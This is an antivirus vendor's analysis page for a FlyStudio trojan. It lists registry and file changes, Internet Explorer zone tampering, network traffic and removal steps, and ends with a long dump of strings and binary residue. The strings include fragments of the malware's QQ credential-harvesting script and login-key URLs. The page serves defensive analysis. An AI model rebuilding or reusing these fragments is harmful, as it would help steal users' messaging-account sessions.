Trojan.Win32.FlyStudio_37b9232bc5 – Adaware

Dynamic Analysis

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:320

The Trojan injects its code into the following process(es):No processes have been created.

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:320 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (720 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (386 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1176 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (0 bytes)

Registry activity

The process %original file name%.exe:320 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 92 51 78 9F F9 0B 4D C0 89 82 82 F5 4C 2E 40"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:320
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (720 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (386 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1176 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ?????
Language: English (United States)

Company Name: Product Name: ?????Product Version: 1.0.0.0Legal Copyright: ?????? ????????Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: ?????Comments: ?????Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	864459	868352	4.48692	08ae43385cc7ff7dcf0044cbff240471
.rdata	872448	1377728	1380352	5.06629	e978478ad976731297bd562531227f95
.data	2252800	305450	69632	3.66828	4f520d746406c0f1e5df2f251de2aeab
.rsrc	2560000	24104	24576	3.57704	47ca1a6a249fcd43784dd29744b270c4

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://www.a.shifen.com/
hxxp://www.baidu.com/

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET / HTTP/1.1

User-Agent: test

Host: VVV.baidu.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 08 Feb 2016 23:56:07 GMT

Content-Type: text/html

Content-Length: 14613

Last-Modified: Wed, 03 Sep 2014 02:48:32 GMT

Connection: Keep-Alive

Vary: Accept-Encoding

Set-Cookie: BAIDUID=7ECCBD44D7BC3DAA29EB49E24349EE89:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com

Set-Cookie: BIDUPSID=7ECCBD44D7BC3DAA29EB49E24349EE89; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com

Set-Cookie: PSTM=1454975767; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com

Set-Cookie: BDSVRTM=0; path=/

P3P: CP=" OTI DSP COR IVA OUR IND COM "

Server: BWS/1.1

X-UA-Compatible: IE=Edge,chrome=1

Pragma: no-cache

Cache-control: no-cache

BDPAGETYPE: 1

BDQID: 0xb579a4030053db48

BDUSERID: 0

Accept-Ranges: bytes

<!DOCTYPE html>..<html>..<head>...<meta http-equiv="content-type" content="text/html;charset=utf-8">...<meta http-equiv="X-UA-Compatible" content="IE=Edge">...<link rel="dns-prefetch" href="//s1.bdstatic.com"/>...<link rel="dns-prefetch" href="//t1.baidu.com"/>...<link rel="dns-prefetch" href="//t2.baidu.com"/>...<link rel="dns-prefetch" href="//t3.baidu.com"/>...<link rel="dns-prefetch" href="//t10.baidu.com"/>...<link rel="dns-prefetch" href="//t11.baidu.com"/>...<link rel="dns-prefetch" href="//t12.baidu.com"/>...<link rel="dns-prefetch" href="//b1.bdstatic.com"/>...<title>...........................</title>...<link href="hXXp://s1.bdstatic.com/r/www/cache/static/home/css/index.css" rel="stylesheet" type="text/css" />.........<script>var hashMatch = document.location.href.match(/# (.*wd=[^&]. )/);if (hashMatch && hashMatch[0] && hashMatch[1]) {document.location.replace("hXXp://" location.host "/s?" hashMatch[1]);}var ns_c = function(){};</script>...<script>function h(obj){obj.style.behavior='url(#default#homepage)';var a = obj.setHomePage('//VVV.baidu.com/');}</script>...<noscript><meta http-equiv="refresh" conte

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_320:

.text

`.rdata

@.data

.rsrc

t%SVh

t$(SSh

~%UVW

u$SShe

user32.dll

gdiplus.dll

wininet.dll

kernel32.dll

ole32.dll

atl.dll

OLEACC.DLL

GdiPlus.dll

shlwapi.dll

Psapi.dll

advapi32.dll

ntdll.dll

MsgWaitForMultipleObjects

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

GdiplusShutdown

ShellExecuteA

EnumChildWindows

{A0005538-9391-4dd9-B4D6-8EB7B9360F08}

hXXp://VVV.cfhuimie.com

1.0.0.0

/newsoft.txt

softsql

uRiscmDvqFRNqngcTF

ueeoscRTDqTugAuoga

beeoscRTDqTugAuoga

qCeoscRTDqTugAuoga

/mark/card.php

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

http=

https

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

hXXps://

hXXp://

/mark/user.php?m=logout

/mark/login.php?m=alert

/mark/user.php?m=ucenter

hXXp://VVV.rdcnzz.com/v1/data/link_conv/rd_dispatcher.php?orig_link=

Adodb.Stream

/mark/reg.php?m=alert

hXXp://id.qq.com/index.html

/index.html HTTP/1.1

hXXp://ui.ptlogin2.qq.com/cgi-bin/login?appid=1006102&hide_title_bar=1&begin_time=1372415816506&css=http://id.qq.com/css/pt_login.css?v=1.11.30&f_url=loginerroralert&no_verifyimg=1&qlogin_jumpname=jump&hide_close_icon=1&s_url=hXXp://id.qq.com/index.html

&_=1397912308807

hXXp://183.60.15.179/cgi-bin/user/cgi_personal_card?uin=

"nickname":"

&spec=100&url_enc=0&referer=bu_interface&term_type=PC

hXXp://q2.qlogo.cn/headimg_dl?bs=

/data/head.jpg

{557CF400-1A04-11D3-9A73-0000F81EF32E}

{557CF401-1A04-11D3-9A73-0000F81EF32E}

{557CF402-1A04-11D3-9A73-0000F81EF32E}

{557CF405-1A04-11D3-9A73-0000F81EF32E}

{557CF406-1A04-11D3-9A73-0000F81EF32E}

hXXp://vodcdn.video.taobao.com/player/ugc/tb_ugc_pieces_core_player_loader.swf?version=1.0.20140702174521&vid=11784817&uid=1727027335&p=1&t=1&rid=http://adk82.com/&random=6666

tencent://message/?uin=331397210&Site=im.qq.com&Menu=yes

:hXXp://VVV.tmd.la

hXXp://tieba.baidu.com/f?kw=Â´Â©Ã”Â½Â»Ã°ÃÃŸ&fr=ala0

hXXp://VVV.2345.com/?k83824709

SSOAxCtrlForPTLogin.SSOForPTLogin2

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin

document.body.innerHTML=GetuinKey();

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g

&keyindex=9&pt_aid=1006102&daid=1&u1=http://id.qq.com/index.html

&clientkey=

hXXp://ptlogin2.qq.com/jump?clientuin=

hXXp://id.qq.com

HTTP/1.1

&keyindex=9&pt_aid=46000101&daid=6&low_login_enable=1&low_login_hour=720&u1=http://t.qq.com

p_uin=; p_skey=; pt4_token=;

hXXp://api.t.qq.com/old/publish.php

&countType=&viewModel=&attips=&pic=&apiType=14&pgv_ref=web.base.master.talkBox.btnApolloMyHome&syncQzone=1&syncQQSign=0&adRich=0&g_tk=

skey=@

function time(){return new Date().getTime()}

function encrypt(str,pass){

data = m_xxtea.encrypt(str, pass);

function decrypt(str,pass){

data = m_xxtea.decrypt(str, pass);

if (str.match(/^[\x00-\x7f]*$/) != null) {

return str.toString();

len = str.length;

c = str.charCodeAt(i);

out[j] = str.charAt(i);

out[j] = String.fromCharCode(0xc0 | (c >>> 6),

out[j] = String.fromCharCode(0xe0 | (c >>> 12),

c2 = str.charCodeAt(i);

out[j] = String.fromCharCode(0xf0 | ((c >>> 18) & 0x3f),

return out.join('');

if ((str.match(/^[\x00-\x7f]*$/) != null) ||

(str.match(/^[\x00-\xff]*$/) == null)) {

c = str.charCodeAt(i );

out[j ] = str.charAt(i - 1);

c2 = str.charCodeAt(i );

out[j ] = String.fromCharCode(((c & 0x1f)

c3 = str.charCodeAt(i );

out[j ] = String.fromCharCode(((c & 0x0f)

c4 = str.charCodeAt(i );

out[j ] = String.fromCharCode(((s >>> 10) & 0x03ff) | 0xd800,

var base64EncodeChars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /'.split('');

len = str.length;

c = str.charCodeAt(i )

str.charCodeAt(i )

str.charCodeAt(i );

c = str.charCodeAt(i );

c = str.charCodeAt(i )

return out.join('');

-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,

-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,

if (/[^ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\ \/\=]/.test(str)) {

if (str.charAt(len - 2) == '=') {

else if (str.charAt(len - 1) == '=') {

c1 = base64DecodeChars[str.charCodeAt(i )];

c2 = base64DecodeChars[str.charCodeAt(i )];

out[j ] = String.fromCharCode((c1 > 4));

c3 = base64DecodeChars[str.charCodeAt(i )];

out[j ] = String.fromCharCode(((c2 & 0x0f) > 2));

c4 = base64DecodeChars[str.charCodeAt(i )];

out[j ] = String.fromCharCode(((c3 & 0x03)

var length = data.length;

data[i] = String.fromCharCode(

return data.join('').substring(0, n);

return data.join('');

var length = string.length;

result[i >> 2] = string.charCodeAt(i) |

string.charCodeAt(i 1)

string.charCodeAt(i 2)

string.charCodeAt(i 3)

result[result.length] = length;

this.encrypt = function(string, key) {

var k = stringToLongArray(key, false);

if (k.length

k.length = 4;

var n = v.length - 1;

var mx, e, p, q = Math.floor(6 52 / (n 1)), sum = 0;

this.decrypt = function(string, key) {

var mx, e, p, q = Math.floor(6 52 / (n 1)), sum = q * delta & 0xffffffff;

MSScriptControl.ScriptControl

* See hXXp://pajhome.org.uk/crypt/md5 for details.

function hex_sha1(s){return binb2hex(core_sha1(str2binb(s),s.length * chrsz));}

function b64_sha1(s){return binb2b64(core_sha1(str2binb(s),s.length * chrsz));}

function str_sha1(s){return binb2str(core_sha1(str2binb(s),s.length * chrsz));}

function hex_hmac_sha1(key, data){ return binb2hex(core_hmac_sha1(key, data));}

function b64_hmac_sha1(key, data){ return binb2b64(core_hmac_sha1(key, data));}

function str_hmac_sha1(key, data){ return binb2str(core_hmac_sha1(key, data));}

for(var i = 0; i

* Calculate the HMAC-SHA1 of a key and some data

function core_hmac_sha1(key, data)

var bkey = str2binb(key);

if(bkey.length > 16) bkey = core_sha1(bkey, key.length * chrsz);

ipad[i] = bkey[i] ^ 0x36363636;

opad[i] = bkey[i] ^ 0x5C5C5C5C;

var hash = core_sha1(ipad.concat(str2binb(data)), 512 data.length * chrsz);

return core_sha1(opad.concat(hash), 512 160);

* Add integers, wrapping at 2^32. This uses 16-bit operations internally

for(var i = 0; i

bin[i>>5] |= (str.charCodeAt(i / chrsz) & mask)

for(var i = 0; i

str = String.fromCharCode((bin[i>>5] >>> (32 - chrsz - i2)) & mask);

for(var i = 0; i

str = hex_tab.charAt((binarray[i>>2] >> ((3 - i%4)*8 4)) & 0xF)

hex_tab.charAt((binarray[i>>2] >> ((3 - i%4)*8 )) & 0xF);

for(var i = 0; i

if(i * 8 j * 6 > binarray.length * 32) str = b64pad;

else str = tab.charAt((triplet >> 6*(3-j)) & 0x3F);

Scripting.Encoder

1, 2, 0, 1, 2, 0, 2, 0, 0, 2, 0, 2, 1, 0, 2, 0,

1, 0, 2, 0, 1, 1, 2, 0, 0, 2, 1, 0, 2, 0, 0, 2,

1, 1, 0, 2, 0, 2, 0, 1, 0, 1, 1, 2, 0, 1, 0, 2,

1, 0, 2, 0, 1, 1, 2, 0, 0, 1, 1, 2, 0, 1, 0, 2

digits["A".charCodeAt(0) i] = i

digits["a".charCodeAt(0) i] = i 26

for (var i=0; i

if (char.charCodeAt(0) > 126) return char

if (escapes.indexOf(char) != -1) return escaped.substr(escapes.indexOf(char), 1)

val = (digits[string.substr(0,1).charCodeAt(0)]

val = (digits[string.substr(1,1).charCodeAt(0)] >> 4)

val = (digits[string.substr(1,1).charCodeAt(0)] & 0xf)

val = ((digits[string.substr(2,1).charCodeAt(0)] >> 2)

val = ((digits[string.substr(2,1).charCodeAt(0)] & 0x3)

val = (digits[string.substr(3,1).charCodeAt(0)]

scriptIndex = encodingString.indexOf(marker, stringIndex)

unEncodingString = encodingString.substring(stringIndex, scriptIndex)

scriptIndex = marker.length

unEncodingString = encodingString.substr(stringIndex, encodingString.length)

encodingLength = encodingString.substr(scriptIndex, 6)

scriptIndex = (6 "==".length)

stringIndex = scriptIndex "DQgAAA==^#~@".length

char = encodingString.substr(scriptIndex, 1)

if (char.charCodeAt(0)

unEncodingString = String.fromCharCode(transformed[pick_encoding[unEncodingIndexd]][char.charCodeAt(0)])

unEncodingString = unescape(encodingString.substr( scriptIndex, 1))

re = new RegExp("(JScript|VBscript).encode", "gmi")

while(arr = re.exec(unEncodingString)) unEncodingString = RegExp.leftContext RegExp.$1 RegExp.rightContext

strdec(AdodbStream.ReadText);

function urlencodeutf8(str) {

function urlencode(str) {

function urldecode(str) {

urlencode

0.0.0.0

0000000000

Math.round(new Date().getTime()/1000)

Math.round(new Date().getTime())

Math.round(new Date().getTime() * 100)

7 9 10 5 8 4 2 1 6 3 7 9 10 5 8 4 2

WScript.Shell

rundll32.exe url.dll,FileProtocolHandler

function trim_output() {while (output.length && (output[output.length - 1] === " " || output[output.length - 1] === indent_string)) {output.pop();}}

function print_newline(ignore_repeated) {ignore_repeated = typeof ignore_repeated === "undefined" ? true : ignore_repeated;trim_output();if (!output.length) {return;}if (output[output.length - 1] !== "\n" || !ignore_repeated) {output.push("\n");}for (var i = 0; i

function print_space() {var last_output = output.length ? output[output.length - 1] : " ";if (last_output !== " " && last_output !== "\n" && last_output !== indent_string) {output.push(" ");}}

function print_token() {output.push(token_text);}

function remove_indent() {if (output.length && output[output.length - 1] === indent_string) {output.pop();}}

function set_mode(mode) {modes.push(current_mode);current_mode = mode;}

function restore_mode() {do_block_just_closed = current_mode === "DO_BLOCK";current_mode = modes.pop();}

function in_array(what, arr) {for (var i = 0; i

indent_character = indent_character || " ";indent_size = indent_size || 4;indent_string = "";while (indent_size--) {indent_string = indent_character;}input = js_source_text;last_word = "";last_type = "TK_START_EXPR";last_text = "";output = [];do_block_just_closed = false;var_line = false;var_line_tainted = false;whitespace = "\n\r\t ".split("");wordchar = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$".split("");punct = " - * / % & -- = = -= *= /= $= == === != !== > = > >> >>>= >>=

x =a.replace(/^\s /, '')

1970/01/01 00:00:00

Z ).gvtB

(7),01444

'9=82<.342>

, #&')*)

-0-(0%()(

1.0.3.6

%! &"!&"!&"!&"!&"!&"!&"!&"!$

%! %! &"!&"!'"!'

" " #!!#!!#!!$

% !% !% !% !$

%! %! %! &"!&"!'"!)!! !!,"",""-##-##-##-##)

* * !! !! !!/$&/$&/$&/$&/$&.#%-"$,!#-"$-"$.#%.#%.#%/$&/$&/$&1&(1&(2')2')2')1&(0%'/$&,!#-"$/$&1&(2')3(*4) 4) 7(,7(,8)-8)-8)-9*.8*.8*.8-09.19.19.17.17.18/28/2903903:14;254:?5;@63;=2:=2:=2:>3=@5?B7AB9CA9D@9FA:GA:G@9FA:GAMAN@?OB@SBBTADS>CR>BT>BT=CV?EXAF[CH]E^AHaBIdBIdAGd@FcAIgAIgAIgAIgBJhCKiDLjEMkFNlFNlGOmGOmGOmFNlEMkEMkFNlFNlFNlFNlFNlFNlFNlFNlIQoIQoIQoHPnHPnGOmGOmGOmINmKPoNSrMRqIOlGMjHNkJPmJQlKRmJQlJQjJQjLSlJQjGNgEIaX\tJNfFJbGIaZ\tBEZMPeJK`KLaLMaMNbONbML`LL^KK]JIYKJZMJZMJZLIYJGWJETIDSHDPIEQLERMFSMGRKEPLDOKCNMAMMAML@LL@LM?JL>IK=HK=HH9AI:BK;BL01;-.:..:..9--9--9--8,,8,,=11

&!"&!"&!"% !% !% !$

%! %! &! ( * * !! !!,"","","")

* * * !! !! !!.#%.#%/$&/$&.#%-"$,!#,!#,!#,!#-"$-"$-"$.#%.#%.#%/$&0%'0%'1&(1&(1&(0%'/$&-"$.#%/$&0%'2')2')2')2')7(,7(,7(,8)-8)-8)-8*.8*.8-08-08-09.17.17.17.18/2903903903:14;17=39?5;@63=@5?B7AA7C@7D@9FA:G@9F?8E>:F@;JC>M?NA@PB@SBBT?BQ=BQ>BT>BT>DW?EXAF[BG\=CZ>D[?F_BIbCJeCJeBHeAGd@Hf@Hf@HfAIgAIgCKiDLjEMkEMkFNlFNlGOmGOmFNlEMkEMkHPnHPnHPnHPnHPnHPnHPnHPnIQoIQoIQoHPnHPnGOmGOmGOmINmLQpNSrMRqJPmHNkIOlJQlRYtOVqKRkGNgHOhJQjMTmPUnJNfSWoFJbLPhMOgUWoBEZSVkJK`KL`LMaLMaNMaML`KK]KK]HGWIHXLIYLIYLIYKHXLGVKFUHDPIEQLERLERLFQKEPKCNJBMMAML@LL@LK?KL>IK=HK=HJ./=-.=-.>./<.>

( !( !( !( !& !& !& !& !&!"&!"#!!#!!" !

'"#&!"$""#!!" !

* * * !! !!*

! " ",!#,!# "*

! " " ",!#-"$.#%0%'1&(2')2')2')/$&0%'1&(1&(2')1&(1&(0%'5%,6&-6&-6&-7'.7'.6(.6(.6*06*06*07 16,26,27-37-38.48.48.48.49/5;173=?4>@4@?5A>5B=6C;K>;K=;N=;N?=P@>QB@SBBTP;?Q=AS@DV?EX?DY>BZ>BZ=B[>C\>E`@GbAGdAGdAGd?Ge?Fg=Fg=Fg=Fg>Gh?HiAJkAJkAJkAJkBKlCLmCLmCLmCLmBKlBLjBLjBLjBLjBLjBLjBLjBLjFPnEOmEOmEOmEOmEOmEOmGOmGMjJNkKOlKOlJNkJNkIMiIMiJOhKPiOTmRWpQWnMSjKQhMSjLPhPTlIMeSWoSVkILaILaLOdKL`KL`KM_JL^KK]KK]JJ\II[HGWHGWJGWJGWJGWIFVKFUKFUHDPHDPJCPIBOICNHBMIALIALJ>JJ>JI=IHF6=D4;D59F59F58F58F58E47E47E47E47B14B14A03A03@/2@/2?.1?.1?/0?/0?/0@01@01@01@01@01>./=-.

! ",!# #$,$%-%&-%&("#("#'"#'"#&!"&!"&!"% !&!"&!"&!"&!"&!"&!"&!"&!"$

'"#&!"#!!" !

!,!#-"$/$&0%'2')3(*3(*4) 0%'1&(2')2')3(*2')2')1&(5%,5%,5%,5%,6&-6&-5'-6(.4(.5)/5)/6*05 16,27-37-35.35.35.35.36.57/68079187.88/990::1;=3?>P@?S@?S;=O:>P=AT?CV>CX>CX>BZ=AY;@YDa?Eb?Dc>Fd>EfGh@Ij@Ij?Hi@IjAJkBKlCLmCLmBKlBKlAKiAKiAKiAKiAKiAKiAKiAKiDNlEOmEOmEOmEOmEOmEOmGOmKQnMQnNRoNRoOSoOSoNRnMQmOTmJOhGMdGMdFLcEKbLRiV\sDI^PUjJOdJOdHK`ADYOSf?CVKL`KL`JL^IK]JJ\II[IIYIIYKJZJIYJGWIFVHEUFCSHCRGBQHDPHDPIBOHANGALF@KG?JG?JHE5./>./>./>./>./>./=-.

% !% !" !

'!"'!"% !% !% !$

% !% !% !% !% !% !% !% !$

! " "*

& !& !% !$

! " " "(

! ",!#,!#,!#,!#(

#5"&9"&9

)RViMQcLN`KM_HJ\FHZEGYDFXGGYGGYGGYGEXECVFCSEATEBRHBSIDSHCRGBQF?ND=JCE6>D6

! " ")

)!"& !( !%

",!#,!#)

$3*/>,1@

!,!#,!#)

! " " ",!#*

)!")!"( !( !( !'

( !( !( !( !'

! " " ",!#,!#,!#*

$0/9%$. '2

#2/8#!',)2

25:8;@149

',,(.,(-($*$#'

;7

56:%&*038

, , , -!!-!!*

9681.0$!#-*,"!#

* /56: 1

, , , ,

2/10-/%"$)&(%%%

"$%./3 ,0

!-!!, ,

$' %(!&(!&' ''

'&(213, - *,)))

&1!(0 '0!%.

-/0.-/*) ,*

$ ,&".&".$!0$!0##1##1##1##1%&4&'5''7((8&(:');&';&';'*?( @&*B' C' D' D' D& D(/J'0K'/L'/L'/L'/L%/M%/M&1O'2P'2R(3S'4T(5U(5U(5U%4U%6W&7X&7X&7X&7X(8\)9]'7\'7\'7\(8](7^(7^)8_ 8^,7].7\-8^.9_-:`-:`.;a.^DLj=EbLQjX^u) C

!).1(-0$'

#'%&*"$% ,*'&"

!#&*,./()', '

%%6&'

.!!/##1$#3$#3!"0"#1"%4#&5%'9&(:$(;$(;%(=%(=%)A&*B&*C%)B$'C"&B#)F"*G$,I%-J$/K%0L$.L$.L$/M%0N%0P&1Q%1S&2T&2T$3T"1R"3T$5V$5V#3W#3W%5Y'7[%5Z%5Z&6[&6[&5\'6]'6])6\)5W,6X*6X 7Y*8\ 9] 8^,9_/8]9Ce3:[AIgDHeCGcPQm!$9

!&)267&'%0/

-!!/##1$#3$$4

'D!)F"-I#.J$/K#-K"-K$/M$/M%0P#0P$0R%1S&2T$3T!0Q 1R"2V"2V!1U"2V#3W%5Y$4Y$4Y$4Y%5Z%4[&5\&5\(5[)5Y)5W*6Z(6Z)7[*8\ 8^ 9]*6Z8Bd*3TJQrCHg17TUYv59Q

*./#&$120

./3..4!!'

/ 0 0"%4 $6 $6 $6 $7 $7 #8

$#%*)!&%

#'( 0) 3

#5 $7!%8

&: &= &=

'> (?!)@

"$5!'& &% &%

.3&(0 ,6

.R -S -S -S -S -S -S -S -S"/U"/U"/U"/U#0V#0V#0V#0V"1X"1X"1X"1X%2X%2X&4X&4X&2V(4V 5W,6X.8Z2=]8Cc>IeHQe*2C

!$)(*202:

.U /V /V"/U#0V#0V#0V%1U&2V(1V*3X,5Z0:\3=_6?`8BZ?H\'.A

"$,*,4()3 !

.*!. "/*!.'

//5/.7 *3

8(%>'#

44:0/80/8

6

0)"1 !1* 0)

$%)'(,,-1 1

324'&( *,"!#0/1

6*'@'#

&%'4350/1

&%''&(&%'

#2),;##5-,@'$='$=($=&";'!:(";)#:)#:'"7'!4*!5 !2 !2)

! "&&&///

324&%'"!#"!# *,

"!##"$#"$***&&&

"!%"!%'&*

#,,2&&,#%-

"1*,> *>*)=(&

0[!2]"3^

0[ 1\ 1\

),;35G.1F')A(,E'*F#%C()E*)C)(B('A'&@%$>$$

2[!3\!3\!3\!3\#3]#3]"2\"2\$2\$2\%3]%2^(0_(/`&0`$0`#1a

/] 0^ 0^ 0^ 0^ 0^!1_!1_!2]

1\ 1\ 1\#4_#4_#3^#3^#3^#3^&3_&3_)1`)0a'0b$2c$3d]&7b'7a,Z -C

/\ 0^ 0^

/] 0^ 0^!1_ 0^ 0^!1_!1_!1_"2`"2`"2`

4^ 3^!4_#4_#4_jj%5`%5`%5`%5`&6a(5a*4d)3c)2d/$2g#4g$5f$6ej 2W1@`4@X

.# /%"2#"2"!1""4##5"$6 $7 $7 $7

4a 5b 5b"5b#6aj&7bj&6a%5`%5`&6a&6a'7b*4c*4d'2d=$2f#4g$5f&7b

##1!!1 0

5c 4c!5d!5d"7d$6e$7d#6c#6c&6d&7b'8c'8c(8c&6a&6aK#3b#2cN&6e'7f*;f%6]0>b 9V5AY

,) -' -&

4d!5e!5e!5e"6e$6e$6e$6e$7d&6d'7e'8c'8c(9d(9d'7b&6a$4b]&6e'7f(8g :h#3]/?c/

-* -* -* -)

,) -) -*!.*!.(!.(!.' -% /

4%$8''9'&6%$4%"1('7('7''9%&:#&;"&>!&?!%A %D %D %D &C

0[!2]!4_

4g 6f"6f"6f#7g#7f$6e$6eÅ½Å½'7e(8f(8f(9d(8c(8c&6d&6d%6g'8i'9h ;i"2\/?d4Aa0

/]!2] 1\

)&(2),4,.8/4=

#' %( ', ,,

5i"8l"8l"7n!7k!7k"7j!6j!6i!4g!5e!5e"6f$5f$6e%6g(8g&8g'8i&9l':m':m&8m&9l(9j-=k(8b/?c(7W7Ea

$#$(#$(%#)(&,)'-&%.$$0

!4 "4"$6$&8%'9&)8''7((8

#()-.-1'&*

%8%*?%,@"(?

$' %(!&&

7o 7o 7o"9q$9p$9p$:n$9p&;o';r(=q$9m$9m$9m#7n#6o!5n!5o!5n"7k)=m'9h-?h6Fk%4UBPm

8t!9u!9s 8t 8r"8r!8p"8r#:r%9r&:s%9r%9r%9r%9s$7t"7t!6t!6s(r#7g,?j1Bi$4X@Qr3@Z

:"%D& L%-R$-S# S! S (P

:w 9y 9w 9w!:x#:x$u!6i'

%&).),1''-!!'

&9}%>~">~#?

)>r ?o.An1Dj

#'#( !',

!()-2 '*

(' :9;435

"()3,.6 "*

